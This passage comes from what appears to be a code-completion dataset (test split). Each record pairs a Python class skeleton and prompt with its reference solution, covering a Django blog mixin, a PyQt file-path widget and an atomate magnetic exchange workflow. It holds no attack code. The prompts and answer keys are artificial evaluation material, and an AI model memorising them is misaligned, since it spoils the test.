page\n\n<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "revision_id": "3379c5d5f2105a2cefc63ca6a5bf2bc3b995a8a3", "skeleton": "<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BlogMixin:\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n", "source": "the_stack_v2_python_sparse", "source_path": "blog/views.py", "source_repo": "TonyFlury/SuffolkCycleDjango", "split": "test", "star_events_count": 0} {"blob_id": "debb8c7fa0fc9beed61de76179ac1bfcbcf14668", "bodies": ["super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\nself.window_file_panel = window_file_panel\nself.setup_file_path_ui()\nself.setup_connections()", "self.path_layout = QtGui.QHBoxLayout(self)\nself.path_layout.setMargin(0)\nself.path_layout.setSpacing(0)\nself.path_line_edit = PanelDoubleClickPath(self)\nself.path_line_edit.setReadOnly(True)\nself.path_layout.addWidget(self.path_line_edit)\nself.push_up_dir = QtGui.QPushButton(self)\nself.push_up_dir.setToolTip('Go up folder')\nself.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\nself.push_up_dir.setIconSize(QtCore.QSize(24, 24))\nself.path_layout.addWidget(self.push_up_dir)", "self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\nself.path_line_edit.returnPressed.connect(self.update_file_path_connection)\nself.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)", "if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)", "edit_path = str(self.path_line_edit.text())\nif os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)"], "bodies_text": "<|body_start_0|>\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "PanelFilePath", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000187", "length_bytes": 2909, "license_type": "no_license", "methods": [{"docstring": "constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class", "name": "__init__", "signature": "def __init__(self, window_file_panel)"}, {"docstring": "setup path file elements including go to parent button used only from constructor", "name": "setup_file_path_ui", "signature": "def setup_file_path_ui(self)"}, {"docstring": "setup path and go to parent button connections used only from constructor", "name": "setup_connections", "signature": "def setup_connections(self)"}, {"docstring": "This connection visually goes to parent folder from current folder", "name": "goto_parent_clicked_connection", "signature": "def goto_parent_clicked_connection(self)"}, {"docstring": "This connection visually goes to written path in the path field", "name": "update_file_path_connection", "signature": "def update_file_path_connection(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004476", "prompt": "Implement the Python class `PanelFilePath` described below.\n\nClass description:\nImplement the PanelFilePath class.\n\nMethod signatures and docstrings:\n- def __init__(self, window_file_panel): constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\n- def setup_file_path_ui(self): setup path file elements including go to parent button used only from constructor\n- def setup_connections(self): setup path and go to parent button connections used only from constructor\n- def goto_parent_clicked_connection(self): This connection visually goes to parent folder from current folder\n- def update_file_path_connection(self): This connection visually goes to written path in the path field", "prompted_full_text": "Implement the Python class `PanelFilePath` described below.\n\nClass description:\nImplement the PanelFilePath class.\n\nMethod signatures and docstrings:\n- def __init__(self, window_file_panel): constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\n- def setup_file_path_ui(self): setup path file elements including go to parent button used only from constructor\n- def setup_connections(self): setup path and go to parent button connections used only from constructor\n- def goto_parent_clicked_connection(self): This connection visually goes to parent folder from current folder\n- def update_file_path_connection(self): This connection visually goes to written path in the path field\n\n<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n<|end_body_0|>\n\n<|body_start_1|>\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n<|end_body_1|>\n\n<|body_start_2|>\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n<|end_body_2|>\n\n<|body_start_3|>\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n<|end_body_3|>\n\n<|body_start_4|>\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n<|end_body_4|>\n", "revision_id": "5f7ab5b39c1dc7d8d2182048c5d8eaff04de3d06", "skeleton": "<|skeleton|>\nclass PanelFilePath:\n\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n <|body_0|>\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n <|body_1|>\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n <|body_2|>\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n <|body_3|>\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PanelFilePath:\n def __init__(self, window_file_panel):\n \"\"\"constructor initializes a widget with a edit line and button to be put on WindowFilePanel. Keyword arguments: :param window_file_panel: an initialized instance (parent widget) of WindowFilePanel class\"\"\"\n super(PanelFilePath, self).__init__(window_file_panel.tab_widget)\n self.window_file_panel = window_file_panel\n self.setup_file_path_ui()\n self.setup_connections()\n\n def setup_file_path_ui(self):\n \"\"\"setup path file elements including go to parent button used only from constructor\"\"\"\n self.path_layout = QtGui.QHBoxLayout(self)\n self.path_layout.setMargin(0)\n self.path_layout.setSpacing(0)\n self.path_line_edit = PanelDoubleClickPath(self)\n self.path_line_edit.setReadOnly(True)\n self.path_layout.addWidget(self.path_line_edit)\n self.push_up_dir = QtGui.QPushButton(self)\n self.push_up_dir.setToolTip('Go up folder')\n self.push_up_dir.setIcon(QtGui.QIcon('resources/icon/cdtoparent.png'))\n self.push_up_dir.setIconSize(QtCore.QSize(24, 24))\n self.path_layout.addWidget(self.push_up_dir)\n\n def setup_connections(self):\n \"\"\"setup path and go to parent button connections used only from constructor\"\"\"\n self.push_up_dir.clicked.connect(self.goto_parent_clicked_connection)\n self.path_line_edit.returnPressed.connect(self.update_file_path_connection)\n self.connect(self.window_file_panel.tree_view, QtCore.SIGNAL('backspacePressed'), self.goto_parent_clicked_connection)\n\n def goto_parent_clicked_connection(self):\n \"\"\"This connection visually goes to parent folder from current folder\"\"\"\n if self.window_file_panel.current_folder_name != '':\n parent_index = self.window_file_panel.tree_view.model.index(self.window_file_panel.current_folder_path)\n folder_index = self.window_file_panel.tree_view.model.parent(parent_index)\n self.window_file_panel.goto_folder(folder_index)\n\n def update_file_path_connection(self):\n \"\"\"This connection visually goes to written path in the path field\"\"\"\n edit_path = str(self.path_line_edit.text())\n if os.path.exists(edit_path):\n edit_path.replace('/', '//')\n self.window_file_panel.goto_folder(self.window_file_panel.tree_view.model.index(edit_path))\n self.path_line_edit.setReadOnly(True)\n", "source": "the_stack_v2_python_sparse", "source_path": "views/window/filepanel/panel_file_path.py", "source_repo": "jafi666/pyCommander", "split": "test", "star_events_count": 0} {"blob_id": "2de27d0e7d6c9c9d98a7cd60b719b7a481c87feb", "bodies": ["self.uuid = str(uuid4())\nself.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\nordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\nordered_energies = sorted(energies, reverse=False)\nself.structures = ordered_structures\nself.energies = ordered_energies\nfor s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")", "c = c or {'DB_FILE': DB_FILE}\nif 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\nheisenberg_settings = c.get('heisenberg_settings', {})\nfws = []\nheisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\nmc_settings = c.get('mc_settings', {})\nvampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\nfws = [heisenberg_model_fw, vampire_fw]\nwf = Workflow(fws)\nwf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\nformula = self.structures[0].composition.reduced_formula\nwf.name = f'{formula} - Exchange'\nreturn wf"], "bodies_text": "<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ExchangeWF", "detected_licenses": ["LicenseRef-scancode-hdf5", "LicenseRef-scancode-generic-cla", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000188", "length_bytes": 4841, "license_type": "permissive", "methods": [{"docstring": "Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these", "name": "__init__", "signature": "def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF')"}, {"docstring": "Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise", "name": "get_wf", "signature": "def get_wf(self, num_orderings_hard_limit=16, c=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005438", "prompt": "Implement the Python class `ExchangeWF` described below.\n\nClass description:\nImplement the ExchangeWF class.\n\nMethod signatures and docstrings:\n- def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'): Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\n- def get_wf(self, num_orderings_hard_limit=16, c=None): Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise", "prompted_full_text": "Implement the Python class `ExchangeWF` described below.\n\nClass description:\nImplement the ExchangeWF class.\n\nMethod signatures and docstrings:\n- def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'): Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\n- def get_wf(self, num_orderings_hard_limit=16, c=None): Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\n\n<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c 